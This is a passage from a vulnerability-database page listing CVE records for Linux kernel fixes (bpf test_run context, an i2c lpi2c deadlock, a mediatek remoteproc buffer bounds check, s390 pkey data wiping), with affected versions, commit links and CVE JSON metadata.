	https://git.kernel.org/stable/c/d387805d4b4a46ee0…
	https://git.kernel.org/stable/c/ae0ba0ab7475a129e…
	https://git.kernel.org/stable/c/d0d1df8ba18abc57f…

Impacted products

Vendor

Product

Version

Linux

Affected: 7adfc6c9b315e174cf8743b21b7b691c8766791b , < 789bd77c9342aa6125003871ae5c6034d0f6f9d2 (git)
Affected: 7adfc6c9b315e174cf8743b21b7b691c8766791b , < 3708b6c2546c9eb34aead8a34a17e8ae69004e4d (git)
Affected: 7adfc6c9b315e174cf8743b21b7b691c8766791b , < d387805d4b4a46ee01e3dae133c81b6d80195e5b (git)
Affected: 7adfc6c9b315e174cf8743b21b7b691c8766791b , < ae0ba0ab7475a129ef7d449966edf677367efeb4 (git)
Affected: 7adfc6c9b315e174cf8743b21b7b691c8766791b , < d0d1df8ba18abc57f28fb3bc053b2bf319367f2c (git)

Linux

Affected: 5.15
Unaffected: 0 , < 5.15 (semver)
Unaffected: 5.15.162 , ≤ 5.15.* (semver)
Unaffected: 6.1.95 , ≤ 6.1.* (semver)
Unaffected: 6.6.35 , ≤ 6.6.* (semver)
Unaffected: 6.9.6 , ≤ 6.9.* (semver)
Unaffected: 6.10 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2025-11-03T21:57:37.675Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/789bd77c9342aa6125003871ae5c6034d0f6f9d2"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/3708b6c2546c9eb34aead8a34a17e8ae69004e4d"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/d387805d4b4a46ee01e3dae133c81b6d80195e5b"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/ae0ba0ab7475a129ef7d449966edf677367efeb4"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/d0d1df8ba18abc57f28fb3bc053b2bf319367f2c"
          },
          {
            "url": "https://lists.debian.org/debian-lts-announce/2025/01/msg00001.html"
          }
        ],
        "title": "CVE Program Container"
      },
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-40908",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-09-10T17:06:12.373504Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-09-11T17:34:37.517Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "net/bpf/test_run.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "789bd77c9342aa6125003871ae5c6034d0f6f9d2",
              "status": "affected",
              "version": "7adfc6c9b315e174cf8743b21b7b691c8766791b",
              "versionType": "git"
            },
            {
              "lessThan": "3708b6c2546c9eb34aead8a34a17e8ae69004e4d",
              "status": "affected",
              "version": "7adfc6c9b315e174cf8743b21b7b691c8766791b",
              "versionType": "git"
            },
            {
              "lessThan": "d387805d4b4a46ee01e3dae133c81b6d80195e5b",
              "status": "affected",
              "version": "7adfc6c9b315e174cf8743b21b7b691c8766791b",
              "versionType": "git"
            },
            {
              "lessThan": "ae0ba0ab7475a129ef7d449966edf677367efeb4",
              "status": "affected",
              "version": "7adfc6c9b315e174cf8743b21b7b691c8766791b",
              "versionType": "git"
            },
            {
              "lessThan": "d0d1df8ba18abc57f28fb3bc053b2bf319367f2c",
              "status": "affected",
              "version": "7adfc6c9b315e174cf8743b21b7b691c8766791b",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "net/bpf/test_run.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "5.15"
            },
            {
              "lessThan": "5.15",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.162",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.95",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.35",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.9.*",
              "status": "unaffected",
              "version": "6.9.6",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.10",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.162",
                  "versionStartIncluding": "5.15",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.95",
                  "versionStartIncluding": "5.15",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.35",
                  "versionStartIncluding": "5.15",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9.6",
                  "versionStartIncluding": "5.15",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.10",
                  "versionStartIncluding": "5.15",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nbpf: Set run context for rawtp test_run callback\n\nsyzbot reported crash when rawtp program executed through the\ntest_run interface calls bpf_get_attach_cookie helper or any\nother helper that touches task-\u003ebpf_ctx pointer.\n\nSetting the run context (task-\u003ebpf_ctx pointer) for test_run\ncallback."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T09:17:35.235Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/789bd77c9342aa6125003871ae5c6034d0f6f9d2"
        },
        {
          "url": "https://git.kernel.org/stable/c/3708b6c2546c9eb34aead8a34a17e8ae69004e4d"
        },
        {
          "url": "https://git.kernel.org/stable/c/d387805d4b4a46ee01e3dae133c81b6d80195e5b"
        },
        {
          "url": "https://git.kernel.org/stable/c/ae0ba0ab7475a129ef7d449966edf677367efeb4"
        },
        {
          "url": "https://git.kernel.org/stable/c/d0d1df8ba18abc57f28fb3bc053b2bf319367f2c"
        }
      ],
      "title": "bpf: Set run context for rawtp test_run callback",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-40908",
    "datePublished": "2024-07-12T12:20:47.807Z",
    "dateReserved": "2024-07-12T12:17:45.580Z",
    "dateUpdated": "2025-11-03T21:57:37.675Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

CVE-2024-40965 (GCVE-0-2024-40965)

Vulnerability from cvelistv5 – Published: 2024-07-12 12:32 – Updated: 2026-01-05 10:36

Title

i2c: lpi2c: Avoid calling clk_get_rate during transfer

Summary

In the Linux kernel, the following vulnerability has been resolved: i2c: lpi2c: Avoid calling clk_get_rate during transfer Instead of repeatedly calling clk_get_rate for each transfer, lock the clock rate and cache the value. A deadlock has been observed while adding tlv320aic32x4 audio codec to the system. When this clock provider adds its clock, the clk mutex is locked already, it needs to access i2c, which in return needs the mutex for clk_get_rate as well.

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/d038693e08adf9c16…
	https://git.kernel.org/stable/c/2b42e9587a7a9c7b8…
	https://git.kernel.org/stable/c/4268254a39484fc11…

Impacted products

Vendor

Product

Version

Linux

Affected: a55fa9d0e42e31b0292540e6324d481aad307644 , < d038693e08adf9c162c6377800495e4f5a2df045 (git)
Affected: a55fa9d0e42e31b0292540e6324d481aad307644 , < 2b42e9587a7a9c7b824e0feb92958f258263963e (git)
Affected: a55fa9d0e42e31b0292540e6324d481aad307644 , < 4268254a39484fc11ba991ae148bacbe75d9cc0a (git)

Linux

Affected: 4.10
Unaffected: 0 , < 4.10 (semver)
Unaffected: 6.6.64 , ≤ 6.6.* (semver)
Unaffected: 6.9.7 , ≤ 6.9.* (semver)
Unaffected: 6.10 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-02T04:39:55.822Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/2b42e9587a7a9c7b824e0feb92958f258263963e"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/4268254a39484fc11ba991ae148bacbe75d9cc0a"
          }
        ],
        "title": "CVE Program Container"
      },
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-40965",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-09-10T17:03:13.465899Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-09-11T17:34:23.239Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "drivers/i2c/busses/i2c-imx-lpi2c.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "d038693e08adf9c162c6377800495e4f5a2df045",
              "status": "affected",
              "version": "a55fa9d0e42e31b0292540e6324d481aad307644",
              "versionType": "git"
            },
            {
              "lessThan": "2b42e9587a7a9c7b824e0feb92958f258263963e",
              "status": "affected",
              "version": "a55fa9d0e42e31b0292540e6324d481aad307644",
              "versionType": "git"
            },
            {
              "lessThan": "4268254a39484fc11ba991ae148bacbe75d9cc0a",
              "status": "affected",
              "version": "a55fa9d0e42e31b0292540e6324d481aad307644",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "drivers/i2c/busses/i2c-imx-lpi2c.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "4.10"
            },
            {
              "lessThan": "4.10",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.64",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.9.*",
              "status": "unaffected",
              "version": "6.9.7",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.10",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.64",
                  "versionStartIncluding": "4.10",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9.7",
                  "versionStartIncluding": "4.10",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.10",
                  "versionStartIncluding": "4.10",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\ni2c: lpi2c: Avoid calling clk_get_rate during transfer\n\nInstead of repeatedly calling clk_get_rate for each transfer, lock\nthe clock rate and cache the value.\nA deadlock has been observed while adding tlv320aic32x4 audio codec to\nthe system. When this clock provider adds its clock, the clk mutex is\nlocked already, it needs to access i2c, which in return needs the mutex\nfor clk_get_rate as well."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-01-05T10:36:53.734Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/d038693e08adf9c162c6377800495e4f5a2df045"
        },
        {
          "url": "https://git.kernel.org/stable/c/2b42e9587a7a9c7b824e0feb92958f258263963e"
        },
        {
          "url": "https://git.kernel.org/stable/c/4268254a39484fc11ba991ae148bacbe75d9cc0a"
        }
      ],
      "title": "i2c: lpi2c: Avoid calling clk_get_rate during transfer",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-40965",
    "datePublished": "2024-07-12T12:32:05.453Z",
    "dateReserved": "2024-07-12T12:17:45.602Z",
    "dateUpdated": "2026-01-05T10:36:53.734Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

CVE-2024-36965 (GCVE-0-2024-36965)

Vulnerability from cvelistv5 – Published: 2024-06-08 12:52 – Updated: 2025-05-04 09:12

Title

remoteproc: mediatek: Make sure IPI buffer fits in L2TCM

Summary

In the Linux kernel, the following vulnerability has been resolved: remoteproc: mediatek: Make sure IPI buffer fits in L2TCM The IPI buffer location is read from the firmware that we load to the System Companion Processor, and it's not granted that both the SRAM (L2TCM) size that is defined in the devicetree node is large enough for that, and while this is especially true for multi-core SCP, it's still useful to check on single-core variants as well. Failing to perform this check may make this driver perform R/W operations out of the L2TCM boundary, resulting (at best) in a kernel panic. To fix that, check that the IPI buffer fits, otherwise return a failure and refuse to boot the relevant SCP core (or the SCP at all, if this is single core).

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/00548ac6b14428719…
	https://git.kernel.org/stable/c/1d9e2de24533daca3…
	https://git.kernel.org/stable/c/26c6d7dc8c6a9fde9…
	https://git.kernel.org/stable/c/838b49e211d59fa82…
	https://git.kernel.org/stable/c/36c79eb4845551e9f…
	https://git.kernel.org/stable/c/331f91d86f71d0bb8…

Impacted products

Vendor

Product

Version

Linux

Affected: 3efa0ea743b77d1611501f7d8b4f320d032d73ae , < 00548ac6b14428719c970ef90adae2b3b48c0cdf (git)
Affected: 3efa0ea743b77d1611501f7d8b4f320d032d73ae , < 1d9e2de24533daca36cbf09e8d8596bf72b526b2 (git)
Affected: 3efa0ea743b77d1611501f7d8b4f320d032d73ae , < 26c6d7dc8c6a9fde9d362ab2eef6390efeff145e (git)
Affected: 3efa0ea743b77d1611501f7d8b4f320d032d73ae , < 838b49e211d59fa827ff9df062d4020917cffbdf (git)
Affected: 3efa0ea743b77d1611501f7d8b4f320d032d73ae , < 36c79eb4845551e9f6d28c663b38ce0ab03b84a9 (git)
Affected: 3efa0ea743b77d1611501f7d8b4f320d032d73ae , < 331f91d86f71d0bb89a44217cc0b2a22810bbd42 (git)

Linux

Affected: 5.11
Unaffected: 0 , < 5.11 (semver)
Unaffected: 5.15.160 , ≤ 5.15.* (semver)
Unaffected: 6.1.92 , ≤ 6.1.* (semver)
Unaffected: 6.6.32 , ≤ 6.6.* (semver)
Unaffected: 6.8.11 , ≤ 6.8.* (semver)
Unaffected: 6.9.2 , ≤ 6.9.* (semver)
Unaffected: 6.10 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-02T03:43:50.595Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/00548ac6b14428719c970ef90adae2b3b48c0cdf"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/1d9e2de24533daca36cbf09e8d8596bf72b526b2"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/26c6d7dc8c6a9fde9d362ab2eef6390efeff145e"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/838b49e211d59fa827ff9df062d4020917cffbdf"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/36c79eb4845551e9f6d28c663b38ce0ab03b84a9"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/331f91d86f71d0bb89a44217cc0b2a22810bbd42"
          }
        ],
        "title": "CVE Program Container"
      },
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-36965",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-09-10T17:15:29.133298Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-09-11T17:34:58.958Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "drivers/remoteproc/mtk_scp.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "00548ac6b14428719c970ef90adae2b3b48c0cdf",
              "status": "affected",
              "version": "3efa0ea743b77d1611501f7d8b4f320d032d73ae",
              "versionType": "git"
            },
            {
              "lessThan": "1d9e2de24533daca36cbf09e8d8596bf72b526b2",
              "status": "affected",
              "version": "3efa0ea743b77d1611501f7d8b4f320d032d73ae",
              "versionType": "git"
            },
            {
              "lessThan": "26c6d7dc8c6a9fde9d362ab2eef6390efeff145e",
              "status": "affected",
              "version": "3efa0ea743b77d1611501f7d8b4f320d032d73ae",
              "versionType": "git"
            },
            {
              "lessThan": "838b49e211d59fa827ff9df062d4020917cffbdf",
              "status": "affected",
              "version": "3efa0ea743b77d1611501f7d8b4f320d032d73ae",
              "versionType": "git"
            },
            {
              "lessThan": "36c79eb4845551e9f6d28c663b38ce0ab03b84a9",
              "status": "affected",
              "version": "3efa0ea743b77d1611501f7d8b4f320d032d73ae",
              "versionType": "git"
            },
            {
              "lessThan": "331f91d86f71d0bb89a44217cc0b2a22810bbd42",
              "status": "affected",
              "version": "3efa0ea743b77d1611501f7d8b4f320d032d73ae",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "drivers/remoteproc/mtk_scp.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "5.11"
            },
            {
              "lessThan": "5.11",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.160",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.92",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.32",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.8.*",
              "status": "unaffected",
              "version": "6.8.11",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.9.*",
              "status": "unaffected",
              "version": "6.9.2",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.10",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.160",
                  "versionStartIncluding": "5.11",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.92",
                  "versionStartIncluding": "5.11",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.32",
                  "versionStartIncluding": "5.11",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.8.11",
                  "versionStartIncluding": "5.11",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9.2",
                  "versionStartIncluding": "5.11",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.10",
                  "versionStartIncluding": "5.11",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nremoteproc: mediatek: Make sure IPI buffer fits in L2TCM\n\nThe IPI buffer location is read from the firmware that we load to the\nSystem Companion Processor, and it\u0027s not granted that both the SRAM\n(L2TCM) size that is defined in the devicetree node is large enough\nfor that, and while this is especially true for multi-core SCP, it\u0027s\nstill useful to check on single-core variants as well.\n\nFailing to perform this check may make this driver perform R/W\noperations out of the L2TCM boundary, resulting (at best) in a\nkernel panic.\n\nTo fix that, check that the IPI buffer fits, otherwise return a\nfailure and refuse to boot the relevant SCP core (or the SCP at\nall, if this is single core)."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T09:12:58.457Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/00548ac6b14428719c970ef90adae2b3b48c0cdf"
        },
        {
          "url": "https://git.kernel.org/stable/c/1d9e2de24533daca36cbf09e8d8596bf72b526b2"
        },
        {
          "url": "https://git.kernel.org/stable/c/26c6d7dc8c6a9fde9d362ab2eef6390efeff145e"
        },
        {
          "url": "https://git.kernel.org/stable/c/838b49e211d59fa827ff9df062d4020917cffbdf"
        },
        {
          "url": "https://git.kernel.org/stable/c/36c79eb4845551e9f6d28c663b38ce0ab03b84a9"
        },
        {
          "url": "https://git.kernel.org/stable/c/331f91d86f71d0bb89a44217cc0b2a22810bbd42"
        }
      ],
      "title": "remoteproc: mediatek: Make sure IPI buffer fits in L2TCM",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-36965",
    "datePublished": "2024-06-08T12:52:58.404Z",
    "dateReserved": "2024-05-30T15:25:07.081Z",
    "dateUpdated": "2025-05-04T09:12:58.457Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2024-42157 (GCVE-0-2024-42157)

Vulnerability from cvelistv5 – Published: 2024-07-30 07:46 – Updated: 2025-11-03 22:02

Title

s390/pkey: Wipe sensitive data on failure

Summary

In the Linux kernel, the following vulnerability has been resolved: s390/pkey: Wipe sensitive data on failure Wipe sensitive data from stack also if the copy_to_user() fails.

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/6e2e374403bf73140…
	https://git.kernel.org/stable/c/b5eb9176ebd4697bc…
	https://git.kernel.org/stable/c/93c034c4314bc4c44…
	https://git.kernel.org/stable/c/4889f117755b2f18c…
	https://git.kernel.org/stable/c/c51795885c801b6b7…
	https://git.kernel.org/stable/c/90a01aefb84b09ccb…
	https://git.kernel.org/stable/c/c44a2151e5d21c66b…
	https://git.kernel.org/stable/c/1d8c270de5eb74245…

Impacted products

Vendor

Product

Version

Linux

Affected: e80d4af0a320972aac58e2004d0ba4e44ef4c5c7 , < 6e2e374403bf73140d0efc9541cb1b3bea55ac02 (git)
Affected: e80d4af0a320972aac58e2004d0ba4e44ef4c5c7 , < b5eb9176ebd4697bc248bf8d145e66d782cf5250 (git)
Affected: e80d4af0a320972aac58e2004d0ba4e44ef4c5c7 , < 93c034c4314bc4c4450a3869cd5da298502346ad (git)
Affected: e80d4af0a320972aac58e2004d0ba4e44ef4c5c7 , < 4889f117755b2f18c23045a0f57977f3ec130581 (git)
Affected: e80d4af0a320972aac58e2004d0ba4e44ef4c5c7 , < c51795885c801b6b7e976717e0d6d45b1e5be0f0 (git)
Affected: e80d4af0a320972aac58e2004d0ba4e44ef4c5c7 , < 90a01aefb84b09ccb6024d75d85bb8f620bd3487 (git)
Affected: e80d4af0a320972aac58e2004d0ba4e44ef4c5c7 , < c44a2151e5d21c66b070a056c26471f30719b575 (git)
Affected: e80d4af0a320972aac58e2004d0ba4e44ef4c5c7 , < 1d8c270de5eb74245d72325d285894a577a945d9 (git)

Linux

Affected: 4.11
Unaffected: 0 , < 4.11 (semver)
Unaffected: 4.19.318 , ≤ 4.19.* (semver)
Unaffected: 5.4.280 , ≤ 5.4.* (semver)
Unaffected: 5.10.222 , ≤ 5.10.* (semver)
Unaffected: 5.15.163 , ≤ 5.15.* (semver)
Unaffected: 6.1.98 , ≤ 6.1.* (semver)
Unaffected: 6.6.39 , ≤ 6.6.* (semver)
Unaffected: 6.9.9 , ≤ 6.9.* (semver)
Unaffected: 6.10 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2025-11-03T22:02:19.958Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/6e2e374403bf73140d0efc9541cb1b3bea55ac02"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/b5eb9176ebd4697bc248bf8d145e66d782cf5250"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/93c034c4314bc4c4450a3869cd5da298502346ad"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/4889f117755b2f18c23045a0f57977f3ec130581"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/c51795885c801b6b7e976717e0d6d45b1e5be0f0"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/90a01aefb84b09ccb6024d75d85bb8f620bd3487"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/c44a2151e5d21c66b070a056c26471f30719b575"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/1d8c270de5eb74245d72325d285894a577a945d9"
          },
          {
            "url": "https://lists.debian.org/debian-lts-announce/2025/01/msg00001.html"
          }
        ],
        "title": "CVE Program Container"
      },
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-42157",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-09-10T16:15:05.289606Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-09-11T17:34:34.008Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "drivers/s390/crypto/pkey_api.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "6e2e374403bf73140d0efc9541cb1b3bea55ac02",
              "status": "affected",
              "version": "e80d4af0a320972aac58e2004d0ba4e44ef4c5c7",
